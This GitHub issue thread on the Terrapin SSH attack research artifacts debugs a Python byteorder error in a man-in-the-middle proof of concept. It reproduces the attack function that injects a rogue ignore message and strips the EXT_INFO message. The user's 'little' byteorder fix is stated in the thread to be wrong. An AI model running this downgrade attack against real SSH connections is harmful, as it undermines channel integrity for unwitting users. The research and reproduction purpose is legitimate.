search

RUB-NDS / Terrapin-Artifacts

This repository contains the artifacts for the paper "Terrapin Attack: Breaking SSH Channel Integrity By Sequence Number Manipulation".
https://terrapin-attack.com
Apache License 2.0
58 stars 7 forks source link

ext_downgrade_chacha20_poly1305.py: TypeError: from_bytes() missing required argument #1

Closed charlesmanser closed 6 months ago

charlesmanser commented 7 months ago

Issue running ext_downgrade_chacha20_poly1305.py

Traceback (most recent call last):
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 87, in <module>
    perform_attack(client_socket, server_socket)
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 66, in perform_attack
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
TypeError: from_bytes() missing required argument 'byteorder' (pos 2)

Running on:

[root@cm-terrapin ext-downgrade]# cat /etc/*elease
NAME="Rocky Linux"
VERSION="9.2 (Blue Onyx)"
ID="rocky"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.2"
PLATFORM_ID="platform:el9"
PRETTY_NAME="Rocky Linux 9.2 (Blue Onyx)"
ANSI_COLOR="0;32"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:rocky:rocky:9::baseos"
HOME_URL="https://rockylinux.org/"
BUG_REPORT_URL="https://bugs.rockylinux.org/"
SUPPORT_END="2032-05-31"
ROCKY_SUPPORT_PRODUCT="Rocky-Linux-9"
ROCKY_SUPPORT_PRODUCT_VERSION="9.2"
REDHAT_SUPPORT_PRODUCT="Rocky Linux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.2"
Rocky Linux release 9.2 (Blue Onyx)
Rocky Linux release 9.2 (Blue Onyx)
Rocky Linux release 9.2 (Blue Onyx)
[root@cm-terrapin ext-downgrade]# python -V
Python 3.9.16
charlesmanser commented 7 months ago

Specifying "little" as the byteorder seems to have resolved the issue:

def perform_attack(client_socket, server_socket):
    # Version exchange
    client_vex = client_socket.recv(255)
    server_vex = server_socket.recv(255)
    client_socket.send(server_vex)
    server_socket.send(client_vex)
    # SSH_MSG_KEXINIT
    client_kexinit = client_socket.recv(35000)
    server_kexinit = server_socket.recv(35000)
    client_socket.send(server_kexinit)
    server_socket.send(client_kexinit)
    # Client will now send the key exchange INIT
    client_kex_init = client_socket.recv(35000)
    server_socket.send(client_kex_init)
    # Insert ignore message (to client)
    client_socket.send(rogue_msg_ignore)
    # Wait half a second here to avoid missing EXT_INFO
    # Can be solved by counting bytes as well
    sleep(0.5)
    # KEX_REPLY / NEW_KEYS / EXT_INFO
    server_response = server_socket.recv(35000)
    # Strip EXT_INFO before forwarding server_response to client
    # Length fields of KEX_REPLY and NEW_KEYS are still unencrypted
    byteorder = "little"
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH], byteorder=byteorder)
    server_newkeys_start = server_kex_reply_length
    server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH], byteorder=byteorder)
    server_extinfo_start = server_newkeys_start + server_newkeys_length
    client_socket.send(server_response[:server_extinfo_start])
Sudococommunity commented 7 months ago

how did you get the issue , tell me steps you ve followed so that i can regenerate the issue

charlesmanser commented 7 months ago
  1. Git clone the repo
  2. edit script to point to new target
  3. attempt to run /root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py
  4. Initiate an ssh connection to local host
  5. error
[root@cm-terrapin ext-downgrade]# python ext_downgrade_chacha20_poly1305.py
--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---
[+] MitM Proxy started. Listening on ('127.0.0.1', 2222) for incoming connections...
[+] Accepted connection from: ('127.0.0.1', 46684)
[+] Establishing new target connection to ('10.32.152.27', 22).
[+] Performing extension downgrade
Traceback (most recent call last):
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 87, in <module>
    perform_attack(client_socket, server_socket)
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 66, in perform_attack
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
TypeError: from_bytes() missing required argument 'byteorder' (pos 2)
TrueSkrillor commented 6 months ago

The default argument value for byteorder has been added in Python 3.11. Using a python version < 3.11 will yield the error mentioned above as byteorder is required and no default argument value is set. Note that Python 3.11 and newer will default to byteorder = 'big', which is correct in this context (network byte order). Setting byteorder = 'little' may cause unexpected behavior due to wrong byte order conversion.

I will update the PoCs with an explicit byteorder = 'big' argument. To avoid this issue entirely, you may update your Python version to 3.11 or newer.

TrueSkrillor commented 6 months ago

I have added the explicit byteorder = 'big' argument in https://github.com/RUB-NDS/Terrapin-Artifacts/commit/8a2416c82ebd2a1a097c11f513bbab73db55798e, which should fix this issue. Feel free to reopen in case your issue persists.